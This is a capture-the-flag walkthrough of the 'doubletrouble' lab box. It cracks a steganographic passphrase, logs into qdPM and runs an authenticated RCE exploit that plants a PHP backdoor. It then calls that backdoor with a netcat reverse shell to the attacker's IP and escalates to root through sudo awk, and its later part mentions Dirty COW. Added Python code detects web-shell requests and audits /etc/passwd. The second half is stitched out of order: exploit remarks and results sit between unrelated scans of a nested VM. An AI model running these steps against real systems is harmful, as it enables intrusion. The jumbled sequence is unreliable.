
doubletrouble writeup & review

磁呃泵 2025-10-1 17:46:23
Because this box is put together in an unusual way, I am writing up a walkthrough for it.
Port scan with nmap
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap -sT -p- 192.168.48.67
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:17 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 20.37 seconds
```
Detailed scan
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap -sT -sC -sV -O -p22,80 192.168.48.67 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0019s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.80 seconds
```
Script scan
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap --script=vuln -p22,80 192.168.48.67 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0017s latency).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.1.1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
|   /backups/: Backup folder w/ directory listing
|   /robots.txt: Robots file
|   /batch/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /core/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /install/: Potentially interesting folder
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /secret/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|   /template/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 38.25 seconds
```
Only two ports are open, so start with port 80.
Browsing to it shows a login page.

It is a CMS, qdPM 9.1. A quick look at the known exploits shows they either require authentication or are fairly hard to use:
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ searchsploit qdPM 9.1
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting  | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection                            | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting              | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection              | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting                          | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload                                | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution                                | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (Authenticated)                | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)     | php/webapps/50944.py
qdPM < 9.1 - Remote Code Execution                              | multiple/webapps/48146.py
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
First, go back to the nmap results to gather more information.
There is a /secret/ directory, which may hold an important clue.
It contains an image; download it.
First check whether any files are embedded in it:
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ binwalk -e doubletrouble.jpg
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
WARNING: One or more files failed to extract: either no utility was found or it's unimplemented
```
Next, check whether it carries steganographic data:
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ steghide info doubletrouble.jpg
"doubletrouble.jpg":
  format: jpeg
  capacity: 4.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
```
So there is hidden data.
I checked the other directories and found nothing useful.
That leaves brute force.
The common choice here is stegcracker,
but I recommend stegseek, which gets through rockyou in a few seconds.
The passphrase comes back almost instantly:
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ ls
doubletrouble.jpg  doubletrouble.jpg.out  nmapscan

┌──(kali㉿kali)-[~/replay/doubletr]
└─$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666
```
Try these credentials against the login page on port 80.
They get us into the backend.
Now we can try the authenticated RCE from the earlier searchsploit output; 50175 throws an error, so try 50944:
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ python3 50944.py -url http://192.168.206.67/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.
The DateStamp is 2025-09-06 02:48
The DateStamp is 2025-09-16 01:41
Backdoor uploaded at - > http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=whoami
```

The exploit works.
Next, use a reverse shell to get an initial foothold:
```
http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=nc%20192.168.206.200%201234%20-e%20/bin/bash
```
Initial shell obtained:
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.206.200] from (UNKNOWN) [192.168.206.67] 33996
ls
584189-backdoor.php
807754-backdoor.php
895627-backdoor.php
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$ ls
ls
584189-backdoor.php  807754-backdoor.php  895627-backdoor.php
www-data@doubletrouble:/var/www/html/uploads/users$
```
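From the defender's side, the trace this leaves is very visible: a PHP file being requested from qdPM's user-upload directory with a `cmd` parameter. Below is an added example (my own code, not from the writeup or from qdPM) that flags such requests in Apache access-log lines. The log lines are constructed; the request path and parameter name mirror the exploit output above, and the parameter-name list is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined-log prefix: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# server-side script extensions that must never be served from an upload directory
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
UPLOAD_DIRS = ("/uploads/",)   # qdPM keeps user files under /uploads/users/
# parameter names used by simple one-line web shells; "cmd" is what the uploaded backdoor takes
SHELL_PARAMS = {"cmd", "c", "exec", "command"}

def classify(line):
    """Return a finding dict for a suspicious request, or None for benign or unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = unquote(url.path)
    if not path.startswith(UPLOAD_DIRS) or not SCRIPT_EXT.search(path):
        return None
    # parse_qs already percent-decodes, so the analyst sees the real command text
    commands = {k: v[0] for k, v in parse_qs(url.query).items() if k in SHELL_PARAMS}
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": path,
        "status": int(m.group("status")),
        "commands": commands,
        "severity": "high" if commands else "medium",
    }

def scan(lines):
    """Run classify over a log and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log; the two backdoor requests mirror the URLs used in the writeup.
SAMPLE_LOG = [
    '192.168.206.200 - - [16/Sep/2025:01:41:02 -0400] "GET /index.php/login HTTP/1.1" 200 5123',
    '192.168.206.200 - - [16/Sep/2025:01:41:09 -0400] "GET /uploads/users/avatar.png HTTP/1.1" 200 811',
    '192.168.206.200 - - [16/Sep/2025:01:41:15 -0400] "GET /uploads/users/895627-backdoor.php?cmd=whoami HTTP/1.1" 200 9',
    '192.168.206.200 - - [16/Sep/2025:01:42:30 -0400] "GET /uploads/users/895627-backdoor.php?cmd=nc%20192.168.206.200%201234%20-e%20/bin/bash HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["path"], f["commands"])
```

The same path check is the basis of the fix: the web server should refuse to execute scripts under the upload directory at all, so that any `.php` reaching it is served as inert text or denied.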
```
www-data@doubletrouble:/var/www/html/uploads/users$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
```
www-data is allowed to run awk as root without a password.
Look up awk on GTFOBins;
it shows the following can be run:
```
sudo awk 'BEGIN {system("/bin/sh")}'
```
```
www-data@doubletrouble:/var/www/html/uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
<uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
doubletrouble.ova
#
```
That Dirty COW script can apparently overwrite the contents of a root-owned file at will, but when I tried it, the contents of /etc/passwd could be changed, yet the result had formatting problems such as misaligned fields.
So let's try dirtycow2 instead.
```
# passwd root
passwd root
New password: 123
Retype new password: 123
passwd: password updated successfully
```
```
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ scp root@192.168.206.67:/root/doubletrouble.ova .
The authenticity of host '192.168.206.67 (192.168.206.67)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:12: [hashed name]
    ~/.ssh/known_hosts:18: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.206.67' (ED25519) to the list of known hosts.
root@192.168.206.67's password:
doubletrouble.ova
```
```
┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap -sT -p- 192.168.206.76 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:04 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds
```
This script effectively creates a user with root privileges, and it also leaves you a backup so the original file can be restored.
```
┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap -sT -sC -sV -O -p22,80 192.168.206.76 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:05 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0013s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
|   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
|   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds
```
Root privileges obtained.
While we are at it, let's use the newly created user to study /etc/passwd:
Output: firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash /sbin:/bin/sh
This is a line from /etc/passwd and represents one user account. On Linux each line is split into fields by colons (:), and each field has a specific meaning.
A normal line has 7 fields, in the format:
username:password:UID:GID:description:home directory:login shell
Breaking this line down:

  • firefart: the username, the first field.
  • fiRbwOlRgkx7g: the password field. On a modern Linux system this field is normally just the placeholder x, and the real password hash is kept in a separate file, /etc/shadow, which only root can read. Here an apparently hashed string appears directly, which is a major security risk: it indicates either that the system uses an old, insecure password storage scheme, or that the account was deliberately set up this way so that an attacker can log in directly with this password.
  • 0: the user ID, the user's unique numeric identifier. UID 0 is root, which has the highest privileges on the system. This is an extremely dangerous sign.
  • 0: the group ID, the numeric identifier of the user's primary group. GID 0 is normally the root group, which again confirms that this account has superuser privileges.
  • pwned: the description (also called the GECOS field). Usually this holds the user's full name or a description. "pwned" is hacker slang for "compromised", which all but announces that the system has been broken into.
  • /root: the home directory, the initial working directory after login. Ordinary users' home directories live under /home/, while /root is the root user's home directory. This further confirms that the account has root privileges.
  • /bin/bash /sbin:/bin/sh: the login shell, the command-line interpreter started after login. The correct format is a single shell path (such as /bin/bash). Here /bin/bash /sbin:/bin/sh is malformed and garbled; it looks as if the attacker concatenated several paths while hastily adding the account, but the system will only try to execute the first part, /bin/bash.
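The checks above can be automated: an added example (my own code, not part of the writeup) that audits /etc/passwd lines for exactly this kind of tampering, flagging an extra field, a hash where the shadow placeholder x belongs, UID/GID 0 on an account other than root, a non-root account homed in /root, and a shell field that is not a single path. The sample file is constructed; only the firefart line is taken from the post.

```python
SHADOW_MARKERS = {"x", "*"}   # what field 2 should hold when /etc/shadow is in use

def audit_line(line):
    """Return the findings (strings) for one passwd line; an empty list means clean."""
    findings = []
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        findings.append(f"field count {len(fields)} != 7")
        fields = (fields + [""] * 7)[:7]   # pad/truncate so the checks below still run
    name, pw, uid, gid, gecos, home, shell = fields
    if pw == "":
        findings.append("empty password field (login without a password)")
    elif pw not in SHADOW_MARKERS and not pw.startswith("!"):
        findings.append("password field holds a hash instead of the shadow placeholder")
    if not uid.isdigit() or not gid.isdigit():
        findings.append(f"non-numeric uid/gid {uid!r}/{gid!r}")
    else:
        if uid == "0" and name != "root":
            findings.append(f"uid 0 account named {name!r}")
        if gid == "0" and name != "root":
            findings.append(f"gid 0 account named {name!r}")
    if home == "/root" and name != "root":
        findings.append("non-root account with home directory /root")
    if " " in shell or not shell.startswith("/"):
        findings.append(f"malformed shell field {shell!r}")
    if "pwned" in gecos.lower():
        findings.append(f"suspicious GECOS text {gecos!r}")
    return findings

def audit(text):
    """Map line number -> findings for every non-empty, non-comment line of a passwd file."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        if line.strip() and not line.startswith("#"):
            found = audit_line(line)
            if found:
                report[n] = found
    return report

# Constructed sample; line 2 is the tampered entry quoted in the writeup.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash /sbin:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup::34:34:backup:/var/backups:/bin/sh
"""
```

Running `audit(SAMPLE_PASSWD)` reports seven findings for the firefart line and one for the passwordless backup account; the other lines come back clean.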